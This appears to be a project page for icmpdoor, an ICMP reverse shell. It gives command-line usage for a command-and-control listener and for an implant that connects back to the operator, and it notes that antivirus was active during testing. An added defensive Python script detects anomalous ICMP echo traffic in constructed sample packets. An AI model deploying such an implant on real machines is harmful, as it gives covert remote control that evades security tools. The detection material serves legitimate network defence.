icmpdoor - ICMP Reverse Shell

icmpdoor is an ICMP reverse shell written in Python 3 with Scapy. Tested on Ubuntu 20.04, Debian 10 (Kali Linux), and Windows 10.

Python version usage (both Windows and Linux):

./icmp-cnc.py -i INTERFACE -d VICTIM-IP (Command and Control)
./icmpdoor.py -i INTERFACE -d CNC-IP (Implant)

Windows binary usage:

./icmp-cnc.exe -d VICTIM-IP (Command and Control)
./icmpdoor.exe -d CNC-IP (Implant)

Linux binary usage:

./icmp-cnc -d VICTIM-IP (Command and Control)
./icmpdoor -d CNC-IP (Implant)

Parameter details:

  -h, --help            show this help message and exit
  -i INTERFACE, --interface INTERFACE
                        Listener (virtual) Network Interface (e.g. eth0)
  -d DESTINATION_IP, --destination_ip DESTINATION_IP
                        Destination IP address
  exit                  Exit Command and Control (E2)

Screenshots

Screenshots 1 and 2 show icmpdoor running on Ubuntu 20.04, Debian 10 (Kali Linux) and Windows 10. ClamAV is active on Ubuntu 20.04.
Microsoft Defender Advanced Threat Protection (ATP) is active on the Windows 10 Enterprise machine.
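A network-side check for this kind of channel, as an added example that is not part of the icmpdoor project: it flags echo traffic that breaks normal ping behaviour (RFC 792 has an echo reply return the request's data unchanged). It assumes the shell carries command text in ICMP echo payloads, which this page does not spell out; the packet bytes, addresses, 64-byte threshold and function names are constructed for illustration.

```python
import struct
from collections import namedtuple

Icmp = namedtuple("Icmp", "src dst type ident seq payload")

def build(src, dst, icmp_type, ident, seq, payload):
    """Build a constructed IPv4+ICMP packet (checksums left at zero)."""
    icmp = struct.pack("!BBHHH", icmp_type, 0, 0, ident, seq) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(icmp), 0, 0, 64, 1, 0,
                     bytes(map(int, src.split("."))), bytes(map(int, dst.split("."))))
    return ip + icmp

def parse(packet):
    """Return an Icmp tuple for IPv4 echo request/reply packets, else None."""
    if len(packet) < 20 or packet[0] >> 4 != 4 or packet[9] != 1:
        return None  # not IPv4 or not ICMP (protocol 1)
    ihl = (packet[0] & 0x0F) * 4
    if ihl < 20 or len(packet) < ihl + 8:
        return None  # malformed or truncated header
    icmp_type, _code, _csum, ident, seq = struct.unpack("!BBHHH", packet[ihl:ihl + 8])
    if icmp_type not in (0, 8):  # 8 = echo request, 0 = echo reply
        return None
    src = ".".join(map(str, packet[12:16]))
    dst = ".".join(map(str, packet[16:20]))
    return Icmp(src, dst, icmp_type, ident, seq, packet[ihl + 8:])

def findings(packets, max_payload=64):
    """Return (source, sequence, reason) for echo traffic unlike ordinary ping."""
    pending, alerts = {}, []
    for p in filter(None, map(parse, packets)):
        if len(p.payload) > max_payload:  # assumed threshold; tune per network
            alerts.append((p.src, p.seq, "oversized-payload"))
        if p.type == 8:
            pending[(p.src, p.dst, p.ident, p.seq)] = p.payload
            continue
        sent = pending.pop((p.dst, p.src, p.ident, p.seq), None)
        if sent is None:
            alerts.append((p.src, p.seq, "unsolicited-reply"))
        elif sent != p.payload:  # a real ping reply echoes the request data
            alerts.append((p.src, p.seq, "reply-payload-mismatch"))
    return alerts

# Constructed sample traffic using documentation address ranges.
PING = bytes(range(0x10, 0x48))  # 56-byte payload standing in for an ordinary ping
SAMPLE = [
    build("192.0.2.10", "192.0.2.20", 8, 1, 1, PING),
    build("192.0.2.20", "192.0.2.10", 0, 1, 1, PING),
    build("198.51.100.5", "192.0.2.20", 8, 7, 1, b"CMD-PLACEHOLDER"),
    build("192.0.2.20", "198.51.100.5", 0, 7, 1, b"OUTPUT-PLACEHOLDER"),
    build("192.0.2.20", "198.51.100.5", 0, 7, 2, b"x" * 200),
]
```

Calling `findings(SAMPLE)` leaves the ordinary ping pair unflagged and reports the three anomalies from 192.0.2.20.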

GitHub

https://github.com/krabelize/icmpdoor